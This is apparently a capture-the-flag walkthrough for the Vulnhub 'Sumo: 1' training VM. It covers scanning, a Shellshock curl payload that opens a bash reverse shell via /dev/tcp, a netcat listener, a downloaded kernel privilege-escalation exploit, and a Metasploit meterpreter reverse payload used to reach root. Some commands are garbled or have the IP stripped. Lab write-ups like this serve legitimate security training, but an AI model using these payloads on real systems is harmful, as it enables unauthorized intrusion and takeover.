Sumo Vulnhub Walkthrough

Sumo Vulnhub Walkthrough | Sumo: 1 Walkthrough Vulnhub | sumo writeup vulnhub

In this Article, we play another vulnhub box sumo is created by SunCSR Team. This VM is Beginner level you can download here sumo: 1 CTF


Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).

Network Scanning

First we discover our target IP address using the netdiscover tool.


Now we have our target IP address our next step is scanning target machine ports and service using nmap ( -A ) aggressive scan

nmap -A


Our target two ports are open 22SSH, and an 80http service running for enumeration we will navigate to a web browser for exploring HTTP service

now we have no clue what we do then we chose nikto web vulnerability scanner

nikto --url

After completing the Nikto scan we found a directory /cgi-bin/test and this directory is vulnerable to the shellshock exploit before execute the curl command first we start our netcat listener

curl -v -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/" 0>&1' "
nc -lvp 4545

After execute the curl command we have reverse shell target machine and we try to find suid binary but we fail then we run the uname -r command and this command is shown target machine kernel version

and this kernel version is vulnerable perf_swevent_init’ Local Privilege Escalation move the /tmp directory and download the exploit

uname -r

then we compile the exploit but we see a error for compiling time gcc: error trying to exec ‘cc1’ : execvp:

chmod 777 kernal.c
gcc kernal.c -02 -o hackNos

now we have a big problem after compile the exploit our VM is crash again we create an Linux meterpreter reverse payload and using the wget command download this payload target machine /tmp directory

and run the msfconsole and load a plugin multi/handler set Linux meterpreter payload listener

msfconsole -x "use exploit/multi/handler"
set payload linux/x86/meterpreter/reverse_tcp
set lhost
set lport 4444

our Metasploit listener is start we add permission our payload then execute our payload using the command

chmod +x paylod.elf && ./payload
python -c 'import pty;pty.spawn("/bin/bash")'

again we go to the /tmp directory and recompile the exploit and add permission read,write,execute for all user and run exploit

gcc kernal.c -02 -o hackNos
chmod 777 hackNos && ./hackNos 0

our exploit is run successfully and we get root shell target machine so let’s move the /root directory and read our root.txt flag.

cd /root
cat root.txt
Katana 1 Vulnhub Walkthrough link